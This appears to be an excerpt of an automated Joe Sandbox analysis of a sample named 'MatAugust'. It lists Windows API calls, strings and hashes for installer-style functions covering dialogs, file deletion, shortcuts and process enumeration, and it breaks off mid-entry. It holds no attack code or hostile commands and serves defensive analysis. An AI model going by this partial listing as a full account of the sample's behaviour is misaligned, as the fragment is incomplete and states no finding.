Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

, xrefs: 00404F39
M, xrefs: 00404B43
@, xrefs: 00404B90
N, xrefs: 00404C06

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

@rD, xrefs: 00404610
A, xrefs: 00404636
82D, xrefs: 004046DB
@%F, xrefs: 00404674

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

GetTTFNameString, xrefs: 00406F07
name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
\*.*, xrefs: 00406D03
Delete: DeleteFile("%s"), xrefs: 00406DBC
Delete: DeleteFile failed("%s"), xrefs: 00406DFD

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

GetModuleBaseNameW, xrefs: 00406494
EnumProcessModules, xrefs: 0040648A
Process32NextW, xrefs: 004065C8
Process32FirstW, xrefs: 004065BD
EnumProcesses, xrefs: 00406482
Unknown, xrefs: 004064FC
Module32NextW, xrefs: 004065DE
PSAPI.DLL, xrefs: 00406464
Kernel32.DLL, xrefs: 0040659B
CreateToolhelp32Snapshot, xrefs: 004065B5
Module32FirstW, xrefs: 004065D3

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

